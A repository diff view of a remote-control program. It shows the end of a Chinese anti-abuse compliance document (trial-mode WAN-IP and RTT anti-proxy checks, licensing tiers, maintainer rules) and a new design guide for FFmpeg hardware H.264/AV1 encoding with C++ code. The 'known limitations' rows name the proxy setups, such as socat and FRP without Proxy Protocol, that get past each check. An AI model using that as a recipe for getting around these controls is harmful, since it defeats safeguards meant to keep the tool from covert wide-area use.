| 设计动机 | 让试用 / 已授权两种主控的客户端行为差异化:试用主控的所有连入客户端自动启用反代理检测;正式授权主控的客户端则关闭,避免误伤合法的跨网远控场景 |
| 兼容性 | 字段位于 `MasterSettings.Reserved` 的前 2 字节,保持 `sizeof(MasterSettings) == 500` 不变;旧客户端连新服务端时按 `MasterSettingsOldSize` 截读,不影响协议兼容 |
### 1.9 服务端入站 IP 段即时检测
| 项目 | 内容 |
| --- | --- |
| 源代码 | [`server/2015Remote/IOCPServer.cpp`](../server/2015Remote/IOCPServer.cpp) `OnAccept` 末段;[`common/LANChecker.h`](../common/LANChecker.h) `LANChecker::IsPrivateIPv4Str` |
| 触发位置 | [`server/2015Remote/2015RemoteDlg.cpp`](../server/2015Remote/2015RemoteDlg.cpp) `CMy2015RemoteDlg::OnTrialWanIpAbuse`(由 `OnAccept` `PostMessage(WM_TRIAL_WAN_IP_ABUSE)` 触发) |
| 检测时机 | 每个新连接 `accept` 后立即检测,**比 RTT 路径快**(无需累计 30 秒的中位数样本) |
| 信号源 | Proxy Protocol v2 透出的真实客户端 IP若存在→ 否则回退到 `getpeername` 的 raw TCP 对端 IP |
| 阈值 | 任一入站 IP 不在 RFC 1918 / RFC 3927 / 回环段 → 即触发 |
| 触发动作 | 每个 abusive 连接独立记 `Mprintf` 日志(含真实 IP + 解析来源);与 [1.10 服务端内核级 RTT 监测](#110-服务端内核级-rtt-监测sio_tcp_info) 共用 `IOCPServer::s_TrialAbuseWarned` 进程级 latch → 主窗口 `MessageBox` 弹一次 |
| 启停 | 仅在 `m_bTrialMode` 为真时执行(`StartServer``IsTrail(passcode)` 缓存);正式授权主控该分支彻底跳过 |
| 设计动机 | 补 [1.10](#110-服务端内核级-rtt-监测sio_tcp_info) 的 TCP 终结代理盲点 —— 合作型代理FRP / HAProxy若发送 PP2 头,本检测就能拿到真实 IP 并直接命中。即时触发,无需等待 RTT 累积 |
| 与客户端 [1.1](#11-入站连接源-ip-段校验) 的关系 | 两层不重复:[1.1] 在 master 进程内**周期性**扫 `GetExtendedTcpTable`,看到的是内核态 raw IP不透 PP2本节在 `OnAccept` **即时**触发,能透 PP2 真实 IP。两层互补 |
| 已知局限 | 不发 PP2 头的代理socat、自制 TCP 转发、不配 PP2 的 FRP→ 看到的仍是代理的 LAN IP**本节漏检**,由 [1.3 客户端 RTT 反代理](#13-应用层-rtt-反代理) 端到端 RTT 兜底 |
| 性能 | 每新连接增加一次 `inet_pton` + 几个位运算(< 1µs。非试用模式下 `m_bTrialMode == false`,整段分支彻底跳过 |
### 1.10 服务端内核级 RTT 监测(`SIO_TCP_INFO`
| 项目 | 内容 |
| --- | --- |
| 源代码 | [`server/2015Remote/IOCPServer.cpp`](../server/2015Remote/IOCPServer.cpp) `RttPollThreadProc` + `QuerySocketTcpRttUs`[`server/2015Remote/Server.h`](../server/2015Remote/Server.h) `CONTEXT_OBJECT::SetRttUs/GetRttUs`[`common/LANChecker.h`](../common/LANChecker.h) `class TcpRttBreachDetector` |
| 触发位置 | [`server/2015Remote/2015RemoteDlg.cpp`](../server/2015Remote/2015RemoteDlg.cpp) `CMy2015RemoteDlg::OnTrialRttAbuse`(由 RTT 轮询线程 `PostMessage(WM_TRIAL_RTT_ABUSE)` 触发) |
| 信号源 | Win10 1703+ / Server 2016+ 提供的 `WSAIoctl(SIO_TCP_INFO)`,返回 `TCP_INFO_v0.RttUs`(内核测得的纯网络 RTT微秒精度不含任何应用层处理 |
| 阈值参数 | 20 ms 中位数 / 滑窗 10 / 收敛跳过 5 / 持续超阈 3 次 @1Hz(最快触发 ≥ 30 秒,是 [1.3 客户端 RTT 反代理](#13-应用层-rtt-反代理) 的 5 倍) |
| 触发动作 | 每个 abusive 连接独立记 `Mprintf` 日志(含 ClientID + 真实 IP + median RTT全 server 进程一次性 latch`s_TrialRttWarned` CAS→ 主窗口 `MessageBox` 弹一次 |
| 启停 | 仅在主控自身为试用模式时(`StartServer``IsTrail(passcode)`)启动专用轮询线程;正式授权主控不启动,零运行时开销 |
| OS 不支持 | 首次 `WSAIoctl` 拿到 `WSAEOPNOTSUPP` 时打一行 `Mprintf` 日志后线程自杀;[1.3 客户端 RTT 反代理](#13-应用层-rtt-反代理) 仍作为兜底 |
| 设计动机 | 服务端检测周期 30 svs 客户端 150 s更快识别直接挂公网的 abusive 部署;且代码运行于发行方 / 运营商可控的服务端二进制,比客户端校验更难绕过 |
| **已知局限(重要)** | `SIO_TCP_INFO` 测得的是**服务端 ↔ 直接 TCP 对端**的 RTT。任何在 TCP 层终结的代理FRP / ngrok / nginx / HAProxy / socat 等)会让服务端只看到"我 ↔ 代理"那段 LAN RTT**完全漏检 WAN 段**。本机制只能识别直挂公网 / NAT / VPN 等"不终结 TCP"的部署形态TCP 终结型代理由 [1.3](#13-应用层-rtt-反代理) 的端到端应用层 RTT 兜底(客户端心跳总耗时无法被任何中间层降低) |
| 范围 | 仅 `IOCPServer`TCPUDP / KCP 通道由 [1.3 客户端 RTT 反代理](#13-应用层-rtt-反代理) 继续兜底 |
---
## 2. 分档授权与对应限制
详见 [`Compliance_AntiAbuse.md` § 7](Compliance_AntiAbuse.md) 与 [`MultiLayerLicense.md`](MultiLayerLicense.md)。本表仅列对应的强制限制点:
| 授权档 | 强制限制 | 由哪一节技术措施实施 |
| --- | --- | --- |
| 无口令 | 监听端口 ≤ 2服务端并发 ≤ 2 | [1.2](#12-监听端口数量上限) + [1.5](#15-服务端硬性并发连接上限) |
| 试用口令 | 入站 IP 必须私网段;端口 ≤ 20客户端 RTT ≤ 25 ms服务端内核 RTT ≤ 20 ms周期回连授权服务器系统时钟可信 | [1.1](#11-入站连接源-ip-段校验) + [1.2](#12-监听端口数量上限) + [1.3](#13-应用层-rtt-反代理) + [1.4](#14-授权服务器周期心跳与超时熔断) + [1.6](#16-系统时钟篡改检测) + [1.9](#19-服务端入站-ip-段即时检测) + [1.10](#110-服务端内核级-rtt-监测sio_tcp_info) |
| 正式授权 | 由签发协议另行约定,技术上解除 1.1 / 1.3 / 1.9 / 1.10 限制 | [1.8](#18-主控授权状态下发) 由服务端下发 `IsTrail=0` 触发客户端关闭;服务端 `IsTrail` 为假时 [1.9](#19-服务端入站-ip-段即时检测) / [1.10](#110-服务端内核级-rtt-监测sio_tcp_info) 均跳过 |
---
## 3. 演进时间线(合规相关提交)
按发布时间倒序排列。`SHA` 列为 `git log --oneline` 可直接核对的短哈希;任何
独立第三方均可在公开仓库通过 `git show <SHA>` 自行验证。
| 日期 | SHA | 主题 | 关联节 |
| --- | --- | --- | --- |
| 2026-05-16 | `7f95f00` | Compliance: Server-side anti-proxy — accept-time WAN-IP check + SIO_TCP_INFO kernel-RTT | [1.9](#19-服务端入站-ip-段即时检测) + [1.10](#110-服务端内核级-rtt-监测sio_tcp_info) |
| 2026-05-15 | `4279e79` | Compliance fix: Move LAN RTT check to KernelManager heartbeat | [1.3](#13-应用层-rtt-反代理) / [1.8](#18-主控授权状态下发) |
| 2026-05-14 | `14387d6` | Compliance: Anti-proxy RTT check + tiered usage policy and disclaimer | [1.3](#13-应用层-rtt-反代理) / [`Compliance_AntiAbuse.md`](Compliance_AntiAbuse.md) v1.0 发布 |
| —(既往) | — | `LANChecker` IP 段 / 端口数检测、`AuthTimeoutChecker` 授权心跳、`DateVerify` 时钟校验等机制 | [1.1](#11-入站连接源-ip-段校验) / [1.2](#12-监听端口数量上限) / [1.4](#14-授权服务器周期心跳与超时熔断) / [1.6](#16-系统时钟篡改检测) |
> 后续提交按 commit message 前缀 `Compliance:` 或 `Compliance fix:` 识别,加入本表。
---
## 4. 规划中的技术措施
> 以下条目为已确定方向但尚未合入主分支的工作项,列出便于审查方了解未来演进。
### 4.1 行为信号融合(占位)
`LANRttChecker` 源码注释中明示的"同源 IP 多 ClientID"行为信号待并入。
计划在授权服务器侧实现,与本仓库客户端 / 主控代码解耦。
针对 [1.10](#110-服务端内核级-rtt-监测sio_tcp_info) 的 TCP 终结代理盲点 ——
合作型代理FRP / HAProxy发送 Proxy Protocol v2 头的情况已由 [1.9](#19-服务端入站-ip-段即时检测) 兜住;
不发 PP2 的代理socat、自制 TCP 转发)的残留盲区由 [1.3 客户端 RTT 反代理](#13-应用层-rtt-反代理)
端到端 RTT 兜底,本仓库内无进一步可加的服务端措施。后续考虑授权服务器侧"同源 IP 多 ClientID"
行为信号作为外部交叉验证。
---
## 5. 维护者注意事项
> **对未来修改本仓库的任何贡献者**:以下文件 / 模块的削弱、移除、绕过型修改
> 应被视为对发行方反滥用立场的直接违反PR 一律拒收。即使您是为了"优化体验"
> 或"修复误报",也请优先选择**调阈值 / 加白名单**而非**禁用机制**。
| 不可被静默削弱的内容 | 文件 |
| --- | --- |
| `LANChecker::CheckAndWarn` 中私网段判定逻辑 | [`common/LANChecker.h`](../common/LANChecker.h) |
| `LANChecker::CheckPortLimit` 的端口数比对 | 同上 |
| `LANRttChecker::SetEnabled` 的启停语义 | 同上 |
| `LANRttChecker::RecordSample` 的滑窗 / 收敛 / 持续超阈逻辑 | 同上 |
| `AuthTimeoutChecker` 的超时熔断分支 | 同上 |
| `DateVerify::isTimeTampered` 的多 NTP 比对 | [`common/DateVerify.h`](../common/DateVerify.h) |
| 服务端 `m_nMaxConnection` 在未授权 / 失效校验时回落到 2 的分支 | [`server/2015Remote/2015RemoteDlg.cpp`](../server/2015Remote/2015RemoteDlg.cpp) |
| 服务端 `MasterSettings.Authorized` / `IsTrail` 字段的真实填充逻辑 | 同上 |
| 客户端 `OnHeatbeatResponse``LANRttChecker` 的调用、`AuthTimeoutChecker` 的复位 | [`client/KernelManager.cpp`](../client/KernelManager.cpp) |
| `TcpRttBreachDetector` 滑窗 / 收敛 / 持续超阈逻辑 | [`common/LANChecker.h`](../common/LANChecker.h) |
| `IOCPServer::OnAccept` 末段试用模式下的入站 IP 段判定PP2 真实 IP 优先) | [`server/2015Remote/IOCPServer.cpp`](../server/2015Remote/IOCPServer.cpp) |
| `IOCPServer::RttPollThreadProc` 试用模式判定、SIO_TCP_INFO 探测、per-context 检测器喂样 | 同上 |
| 主对话框 `OnTrialRttAbuse` / `OnTrialWanIpAbuse` 弹框 + 日志归档;`WM_TRIAL_RTT_ABUSE` / `WM_TRIAL_WAN_IP_ABUSE` 消息映射 | [`server/2015Remote/2015RemoteDlg.cpp`](../server/2015Remote/2015RemoteDlg.cpp) |
| `LANChecker::IsPrivateIPv4Str` 字符串版私网段判定(被 §1.9 直接依赖) | [`common/LANChecker.h`](../common/LANChecker.h) |
允许的修改方向:
- 调整阈值参数(需在 PR 中给出新的统计依据);
- 新增告警通道(如增加日志落盘 / 加 webhook 通知),但不得替换原有告警通道;
- 提高检测精度(如本文档 §4 所列规划项);
- 修复 OS 兼容性 bug但不得以"OS 不支持"为由整体跳过试用档的检测。
---
## 6. 与政策文档的对照表
便于审查方在本仓库技术实现 ↔ `Compliance_AntiAbuse.md` 政策条款之间双向追溯。
| 政策条款 | 本文档节 |
| --- | --- |
| § 6.1 入站连接源 IP 段校验 | [1.1](#11-入站连接源-ip-段校验) |
| § 6.2 监听端口数量上限 | [1.2](#12-监听端口数量上限) |
| § 6.3 应用层 RTT 反代理 | [1.3](#13-应用层-rtt-反代理) + [1.9](#19-服务端入站-ip-段即时检测)(服务端即时 IP 段判定)+ [1.10](#110-服务端内核级-rtt-监测sio_tcp_info)(服务端内核级 RTT 补强) |
| § 6.4 授权服务器周期心跳 | [1.4](#14-授权服务器周期心跳与超时熔断) |
| § 6.5 措施的可被感知性 | 见各节"触发动作"列 |
| § 6.6 措施的合理性声明 | 见各节"已知局限"列 |
| § 7 授权分级与对应限制 | [2](#2-分档授权与对应限制) |
---
文档结束 / END OF DOCUMENT

977
docs/HardwareEncoding_Design.md Normal file
View File

@@ -0,0 +1,977 @@
# 视频编码硬件加速实现指导文档
本文档供 AI 编码助手参考,用于在现有 C++ 远程控制程序中实现 H.264 硬件编码 + AV1 编码路径。
---
## 1. 项目背景
### 1.1 当前状态
- C++ Windows 远程控制程序
- 已实现 H.264 编码,基于 x264 软编(`CX264Encoder`preset = `ultrafast + zerolatency`
- 视频管线桌面捕获RGB/BGRA→ 编码 → 网络传输 → 客户端解码显示
- 当前架构:每个主控端连接对应一个独立编码器实例
- **分发模式**:单 exeFFmpeg 静态链接
### 1.2 目标
分两阶段渐进推进,**始终保留 x264 软编作为兜底**
**阶段一H.264 硬编加速)**
- 新增 H.264 硬编NVENC / QSV / AMF按 GPU 能力探测优先走硬编
- x264 软编在无 GPU / 虚拟机 / 远程桌面会话等环境下兜底
- 浏览器解码零兼容性风险H.264 全平台原生支持)
**阶段二AV1 路径)**
- 新增 AV1 硬编(`av1_nvenc` / `av1_qsv` / `av1_amf`
- 客户端浏览器握手时声明 AV1 能力
- 双方都能用就走 AV1否则回落 H.264
**最终产物仍为单 exe**,体积增量可接受 610 MB。
### 1.3 关键决策记录
#### 1.3.1 为什么跳过 HEVC
经评估HEVC 在本项目目标场景下没有独占价值:
| 维度 | 现状 |
|---|---|
| **浏览器解码** | Firefox 完全不支持Chrome/Edge 需 Win11 + 商店付费的 HEVC Video Extensions |
| **专利授权** | 商用涉及 MPEG-LA / Access Advance / Velos Media 三个专利池 |
| **替代方案** | AV1 压缩效率更高、AOMedia 免专利、浏览器原生支持广 |
HEVC 编码端硬件普及度好(几乎所有 2015+ GPU这个优势被解码端短板完全抵消。
#### 1.3.2 为什么 H.264 硬编先于 AV1
- **AV1 硬编硬件门槛高**:仅 NVIDIA RTX 40+ / AMD RX 7000+ / Intel Arc 才有
- **"多机混杂"场景**下大部分编码端 GPU 没有 AV1 硬编
- **H.264 硬编**NVENC/QSV/AMF几乎所有现代 GPU 都有,覆盖面广
- **客户端浏览器解 H.264** 是零兼容性问题,跨浏览器/跨平台 100% 通用
H.264 硬编是先把"地板抬起来"AV1 是"在新硬件上的天花板"。
### 1.4 设计约束
- **平台**:仅 WindowsmacOS/Linux 未来另行设计)
- **GPU 不确定**NVIDIA / AMD / Intel / 无独显 / 虚拟机无 GPU 都需支持
- **延迟要求**:不敏感(不追求极致低延迟)
- **并发模型**:通常 1 对 1少数 1 对多(每个连接独立编码器)
- **客户端**浏览器WebCodecs 优先,`<video>` 次之),未来集成
- **工具链**Visual Studio 2019
- **属性**:个人项目,暂不商用,专利问题搁置但仍优先选免专利方案
---
## 2. 技术方案总览
### 2.1 编码器优先级链
```
新连接进入(带客户端能力)
├─ 客户端声明支持 AV1─── 否 ────┐
│ 是 │
│ ↓ │
├─ av1_nvenc/qsv/amf 能开?──┐ │
│ │ │ │
│ 成功 → 用 AV1 │ │
│ ↓ ↓
└─ h264_nvenc/qsv/amf/mf 能开?──┐
│ │
成功 → 用 H.264 硬编 │
x264 软编(始终可用)
```
### 2.2 编码器后端表
| 类型 | FFmpeg 编码器名 | 硬件要求 | 备注 |
|---|---|---|---|
| AV1 硬编 | `av1_nvenc` | NVIDIA RTX 40+Ada Lovelace | 2022 Q4 起 |
| AV1 硬编 | `av1_amf` | AMD RX 7000+RDNA 3 | 2022 Q4 起 |
| AV1 硬编 | `av1_qsv` | Intel Arc / 部分新 Iris Xe | 2022 起 |
| H.264 硬编 | `h264_nvenc` | 几乎所有 NVIDIA GPUGTX 650+ | 2012 起 |
| H.264 硬编 | `h264_qsv` | 几乎所有 Intel 核显HD 4000+ | 2012 起 |
| H.264 硬编 | `h264_amf` | 几乎所有 AMD GPU | |
| H.264 硬编 | `h264_mf` | Windows Media Foundation | 兜底,质量/稳定性一般 |
| H.264 软编 | `libx264`(现有 `CX264Encoder` | 任意 CPU | 始终兜底 |
**不使用 `libx265` / `libaom-av1` / `libsvtav1`**CPU 软编),原因:
- 远控产品对 CPU 占用敏感AV1/HEVC 软编实时编码压力大
- `libx265` 会让 FFmpeg 切到 GPL`libaom-av1` 编码速度也不够
### 2.3 类结构
```
VideoEncoderBase新增抽象接口
├── CX264Encoder (改造现有类继承接口,保留软编兜底)
├── CFFmpegH264Encoder (新增,封装 h264_nvenc/qsv/amf/mf
└── CFFmpegAV1Encoder (新增,封装 av1_nvenc/qsv/amf
```
### 2.4 协商流程
```
握手阶段:
- 客户端(浏览器)在 WebSocket 握手时上报能力:
{ "codecs": ["av1", "h264"] } // 浏览器实际能解的,按优先级排
- 服务端取「客户端能力 ∩ 自己硬件能力」选 codec
会话阶段:
- 选定 codec 后创建对应编码器,整个连接生命周期不变
- 运行中不切换 codec保持简单需要切换就重连
```
---
## 3. 硬编 vs 现有 x264 软编对比
### 3.1 CPU 占用(最大收益)
| 编码器 | 1080p @ 30fps CPU 占用 |
|---|---|
| x264 `ultrafast`(现状) | 单核 1530% |
| x264 `medium`(同画质基准) | 单核 60100% |
| `h264_nvenc p4` | 总 **13%** |
| `h264_qsv medium` | 总 25% |
| `h264_amf balanced` | 总 25% |
被控端是用户的主力工作机他自己还在干活。CPU 让出来意味着远控对他几乎不可感。
### 3.2 同 CPU 预算下画质更高
x264 的 preset 排序(同码率下画质):
```
ultrafast < superfast < veryfast < faster < fast < medium < slow ...
↑ 现状 ↑ 标准基准
```
NVENC `p4` 预设大致对应 x264 `fast` ~ `medium`**画质明显优于当前 ultrafast且 CPU 占用低一个数量级**。
### 3.3 其他收益
- **编码延迟稳定**ASIC 不受 CPU 调度影响,单帧 15 ms
- **笔记本电池/温度**ASIC 几瓦,键盘不烫、风扇不转
- **可拉高分辨率/帧率**4K@30 / 多屏拼接软编扛不住,硬编轻松
### 3.4 代价(必须接受)
- **二进制 +610 MB**FFmpeg 静态库,可接受)
- **编译复杂度上升**vcpkg 或自编 FFmpeg
- **不同后端参数语义有差异**rc 模式、preset 名字、bitrate 表现都不一样
- **必须保留 x264 软编兜底**:无 GPU / 远程桌面 / 虚拟机 / NVENC session 满 等场景
---
## 4. 现有 H.264 编码器现状
`CX264Encoder` 签名(`client/X264Encoder.cpp`
```cpp
class CX264Encoder
{
private:
x264_t* m_pCodec;
x264_picture_t* m_pPicIn;
x264_picture_t* m_pPicOut;
x264_param_t m_Param;
public:
bool open(int width, int height, int fps, int crf);
bool open(x264_param_t* param);
void close();
int encode(uint8_t* rgb, uint8_t bpp, uint32_t stride,
uint32_t width, uint32_t height,
uint8_t** lppData, uint32_t* lpSize,
int direction = 1);
};
```
集成点(`client/ScreenCapture.h`
| 位置 | 内容 |
|---|---|
| `L148` | `CX264Encoder* m_encoder;`(持有具体类,需改为接口) |
| `L926-930` | 关键帧路径硬编码 `new CX264Encoder()` |
| `L956-960` | 增量帧路径硬编码 `new CX264Encoder()` |
| `L170-176` | `BitRateToCRF(bitRate)` 码率→CRF 映射 |
参数现状:
- `param.i_threads = 1`
- `preset = "ultrafast", tune = "zerolatency"`
- `i_keyint_max = fps * 15`15 秒一个 IDR
- `i_bframe = 0``b_open_gop = 0`
- `rc.i_rc_method = X264_RC_CRF`CRF 模式,未设 VBV
需要的改造(详见 §6
1. `ScreenCapture::m_encoder``std::unique_ptr<VideoEncoderBase>`
2. 编码器创建走 `CreateEncoder` 工厂
3. 接口的 quality 语义解耦CRF vs kbps详见 §6.2
---
## 5. FFmpeg 静态库准备
### 5.1 推荐方案vcpkg
VS2019 + vcpkg 是最稳的路径:
```
vcpkg install ffmpeg[core,nvcodec,amf,qsv]:x64-windows-static-md
```
要点:
- **三元组选 `x64-windows-static-md`**:链接静态 FFmpeg 但用动态 CRT`/MD`),与本项目当前工程一致
- 如果工程是 `/MT` 改用 `x64-windows-static`
- `nvcodec` feature 引入 NVENC 头文件,`amf` 引入 AMF`qsv` 引入 libmfx
- 阶段一只需要 H.264,可以先不带这些 feature但建议一次到位
阶段二需要 AV1FFmpeg 较新版本默认已支持 `av1_nvenc` / `av1_amf` / `av1_qsv`,无需额外 feature 名。
### 5.2 备选方案:自编
MSYS2 + MinGW-w64 + `--toolchain=msvc` 产出 MSVC 兼容 `.lib`
```bash
./configure \
--prefix=/path/to/install \
--arch=x86_64 \
--target-os=mingw64 \
--toolchain=msvc \
--disable-shared --enable-static \
--disable-everything \
--disable-autodetect \
--disable-network \
--disable-doc \
--disable-programs \
--disable-debug \
--enable-small \
--enable-encoder=h264_nvenc \
--enable-encoder=h264_amf \
--enable-encoder=h264_qsv \
--enable-encoder=h264_mf \
--enable-encoder=av1_nvenc \
--enable-encoder=av1_amf \
--enable-encoder=av1_qsv \
--enable-protocol=file
```
**不要** `--enable-gpl``--enable-libx265 / --enable-libaom`,保持 LGPL 且避免软编 H.265/AV1。
### 5.3 工程链接配置MSVC
**附加包含目录**C/C++ → 常规):
```
$(VcpkgRoot)\installed\x64-windows-static-md\include
```
**附加库目录**(链接器 → 常规):
```
$(VcpkgRoot)\installed\x64-windows-static-md\lib
```
**附加依赖项**(链接器 → 输入):
```
avcodec.lib
avutil.lib
swresample.lib
# FFmpeg 静态链接依赖的 Windows 系统库
mfplat.lib
mfuuid.lib
strmiids.lib
ws2_32.lib
secur32.lib
bcrypt.lib
```
**预处理器定义**
```
ENABLE_HW_ENCODER
__STDC_CONSTANT_MACROS # FFmpeg C 头文件在 C++ 中需要
```
---
## 6. 实现任务清单
### 6.1 文件清单
| 文件 | 操作 | 说明 |
|---|---|---|
| `VideoEncoderBase.h` | 新增 | 抽象基类 + EncoderParams |
| `X264Encoder.h/.cpp` | 修改 | 继承 `VideoEncoderBase`,新增 `forceIDR()` / `codec()` / `backendName()` |
| `CFFmpegH264Encoder.h/.cpp` | 新增(阶段一) | 封装 `h264_nvenc/qsv/amf/mf` |
| `CFFmpegAV1Encoder.h/.cpp` | 新增(阶段二) | 封装 `av1_nvenc/qsv/amf` |
| `EncoderFactory.h/.cpp` | 新增 | 工厂 + 多后端探测 |
| `EncoderProbe.h/.cpp` | 新增 | 启动时一次性探测可用后端,缓存结果 |
| `ScreenCapture.h` | 修改 | `m_encoder``std::unique_ptr<VideoEncoderBase>` |
| 握手协议代码 | 修改(阶段二) | 加 `codecs` 能力字段 |
| 工程配置 | 修改 | FFmpeg 静态库链接(详见 §5.3 |
### 6.2 抽象接口定义
`VideoEncoderBase.h`
```cpp
#pragma once
#include <cstdint>
enum class VideoCodec { H264, AV1 };
enum class RateControl { CRF, BITRATE };
struct EncoderParams {
int width;
int height;
int fps;
RateControl rc = RateControl::BITRATE;
int crf = 23; // 当 rc == CRF 时使用x264 路径)
int bitrate_kbps = 4000; // 当 rc == BITRATE 时使用(硬编路径)
int gop_seconds = 4; // 关键帧间隔(秒),编码器内部转 frames
};
class VideoEncoderBase {
public:
virtual ~VideoEncoderBase() = default;
virtual bool open(const EncoderParams& params) = 0;
virtual void close() = 0;
virtual int encode(
uint8_t* rgb,
uint8_t bpp,
uint32_t stride,
uint32_t width,
uint32_t height,
uint8_t** lppData,
uint32_t* lpSize,
int direction = 1
) = 0;
virtual void forceIDR() = 0;
virtual void setBitrate(int kbps) {} // 默认空实现
virtual VideoCodec codec() const = 0;
virtual const char* backendName() const = 0; // "x264" / "h264_nvenc" / "av1_amf" ...
};
```
设计要点:
- **抛弃** `open(w, h, fps, quality)` 的设计 —— `quality` 在 H.264 是 CRF、在硬编是 kbps语义不清楚是坑
- 改用 `EncoderParams` 结构体 + `RateControl` 枚举,明确指定速率控制模式
- `backendName()` 返回实际后端名("x264" / "h264_nvenc" / "av1_amf"),调用方可用于日志/监控
### 6.3 CFFmpegH264Encoder 设计
```cpp
#pragma once
#include "VideoEncoderBase.h"
#include <vector>
#include <string>
extern "C" {
#include <libavcodec/avcodec.h>
#include <libavutil/opt.h>
#include <libavutil/imgutils.h>
}
class CFFmpegH264Encoder : public VideoEncoderBase {
public:
CFFmpegH264Encoder();
~CFFmpegH264Encoder() override;
bool open(const EncoderParams& params) override;
void close() override;
int encode(uint8_t* rgb, uint8_t bpp, uint32_t stride,
uint32_t width, uint32_t height,
uint8_t** lppData, uint32_t* lpSize,
int direction = 1) override;
void forceIDR() override;
void setBitrate(int kbps) override;
VideoCodec codec() const override { return VideoCodec::H264; }
const char* backendName() const override { return m_backend.c_str(); }
private:
bool tryOpenBackend(const char* name, const EncoderParams& p);
void cleanupCodec();
int convertToNV12(uint8_t* rgb, uint8_t bpp, uint32_t stride,
uint32_t width, uint32_t height, int direction);
AVCodecContext* m_ctx = nullptr;
AVFrame* m_frame = nullptr;
AVPacket* m_packet = nullptr;
std::vector<uint8_t> m_outputBuffer;
std::vector<uint8_t> m_i420Scratch; // RGB24 路径用
int64_t m_pts = 0;
bool m_forceIDR = false;
std::string m_backend;
};
```
#### 6.3.1 后端探测顺序
```cpp
static const char* kH264Backends[] = {
"h264_nvenc", // NVIDIA质量/速度/稳定性都最好
"h264_qsv", // Intel核显普及度高
"h264_amf", // AMD
"h264_mf", // Media Foundation 兜底(可选,质量一般)
};
bool CFFmpegH264Encoder::open(const EncoderParams& p) {
for (auto name : kH264Backends) {
if (tryOpenBackend(name, p)) {
m_backend = name;
return true;
}
cleanupCodec();
}
return false;
}
```
#### 6.3.2 各后端参数差异
```cpp
bool CFFmpegH264Encoder::tryOpenBackend(const char* name, const EncoderParams& p) {
const AVCodec* codec = avcodec_find_encoder_by_name(name);
if (!codec) return false;
m_ctx = avcodec_alloc_context3(codec);
if (!m_ctx) return false;
// 通用参数
m_ctx->width = p.width;
m_ctx->height = p.height;
m_ctx->time_base = {1, p.fps};
m_ctx->framerate = {p.fps, 1};
m_ctx->pix_fmt = AV_PIX_FMT_NV12;
m_ctx->gop_size = p.fps * p.gop_seconds;
m_ctx->max_b_frames = 0;
m_ctx->bit_rate = (int64_t)p.bitrate_kbps * 1000;
m_ctx->rc_max_rate = (int64_t)p.bitrate_kbps * 1500;
m_ctx->rc_buffer_size = (int)(p.bitrate_kbps * 1000);
if (strcmp(name, "h264_nvenc") == 0) {
av_opt_set(m_ctx->priv_data, "preset", "p4", 0);
av_opt_set(m_ctx->priv_data, "tune", "ll", 0);
av_opt_set(m_ctx->priv_data, "rc", "cbr", 0);
av_opt_set(m_ctx->priv_data, "zerolatency", "1", 0);
av_opt_set(m_ctx->priv_data, "delay", "0", 0);
} else if (strcmp(name, "h264_qsv") == 0) {
av_opt_set(m_ctx->priv_data, "preset", "medium", 0);
av_opt_set_int(m_ctx->priv_data, "async_depth", 1, 0);
av_opt_set_int(m_ctx->priv_data, "low_power", 0, 0);
} else if (strcmp(name, "h264_amf") == 0) {
av_opt_set(m_ctx->priv_data, "usage", "lowlatency", 0);
av_opt_set(m_ctx->priv_data, "quality", "balanced", 0);
av_opt_set(m_ctx->priv_data, "rc", "cbr", 0);
} else if (strcmp(name, "h264_mf") == 0) {
av_opt_set_int(m_ctx->priv_data, "hw_encoding", 1, 0);
av_opt_set(m_ctx->priv_data, "rate_control", "cbr", 0);
}
if (avcodec_open2(m_ctx, codec, nullptr) < 0) return false;
m_frame = av_frame_alloc();
m_frame->format = AV_PIX_FMT_NV12;
m_frame->width = p.width;
m_frame->height = p.height;
if (av_frame_get_buffer(m_frame, 32) < 0) return false;
m_packet = av_packet_alloc();
return m_packet != nullptr;
}
```
#### 6.3.3 encode 实现
```cpp
int CFFmpegH264Encoder::encode(
uint8_t* rgb, uint8_t bpp, uint32_t stride,
uint32_t width, uint32_t height,
uint8_t** lppData, uint32_t* lpSize, int direction)
{
if (av_frame_make_writable(m_frame) < 0) return -1;
// 像素格式转换(直接用 libyuv与现有 x264 路径保持一致,不引入 sws_scale
int signed_height = direction * (int)height;
if (bpp == 32) {
libyuv::ARGBToNV12(
rgb, stride,
m_frame->data[0], m_frame->linesize[0],
m_frame->data[1], m_frame->linesize[1],
width, signed_height
);
} else if (bpp == 24) {
if (convertToNV12(rgb, bpp, stride, width, height, direction) != 0)
return -1;
} else {
return -2;
}
m_frame->pts = m_pts++;
if (m_forceIDR) {
m_frame->pict_type = AV_PICTURE_TYPE_I;
m_frame->key_frame = 1;
m_forceIDR = false;
} else {
m_frame->pict_type = AV_PICTURE_TYPE_NONE;
m_frame->key_frame = 0;
}
if (avcodec_send_frame(m_ctx, m_frame) < 0) return -3;
int ret = avcodec_receive_packet(m_ctx, m_packet);
if (ret == AVERROR(EAGAIN)) {
// 首帧延迟正常情况:返回成功但本次无输出
*lpSize = 0;
*lppData = nullptr;
return 0;
}
if (ret < 0) return -4;
m_outputBuffer.assign(m_packet->data, m_packet->data + m_packet->size);
*lppData = m_outputBuffer.data();
*lpSize = (uint32_t)m_outputBuffer.size();
av_packet_unref(m_packet);
return 0;
}
```
#### 6.3.4 RGB24 → NV12libyuv 无直接 API两步走
```cpp
int CFFmpegH264Encoder::convertToNV12(uint8_t* rgb, uint8_t /*bpp*/,
uint32_t stride, uint32_t width, uint32_t height,
int direction)
{
int signed_height = direction * (int)height;
int y_size = width * height;
int uv_size = (width / 2) * (height / 2);
m_i420Scratch.resize(y_size + 2 * uv_size);
uint8_t* y = m_i420Scratch.data();
uint8_t* u = y + y_size;
uint8_t* v = u + uv_size;
libyuv::RGB24ToI420(
rgb, stride,
y, width,
u, width / 2,
v, width / 2,
width, signed_height
);
libyuv::I420ToNV12(
y, width,
u, width / 2,
v, width / 2,
m_frame->data[0], m_frame->linesize[0],
m_frame->data[1], m_frame->linesize[1],
width, height
);
return 0;
}
```
### 6.4 CFFmpegAV1Encoder 设计
结构与 `CFFmpegH264Encoder` **完全对称**,仅 backend 名换:
```cpp
static const char* kAV1Backends[] = {
"av1_nvenc", // RTX 40+
"av1_amf", // RX 7000+
"av1_qsv", // Intel Arc / 部分 11 代+ 核显
};
```
参数差异av1_nvenc 与 h264_nvenc 略有不同):
```cpp
if (strcmp(name, "av1_nvenc") == 0) {
av_opt_set(m_ctx->priv_data, "preset", "p4", 0);
av_opt_set(m_ctx->priv_data, "tune", "ll", 0);
av_opt_set(m_ctx->priv_data, "rc", "cbr", 0);
// AV1 特有tile-columns/rows 可调,多核解码更友好
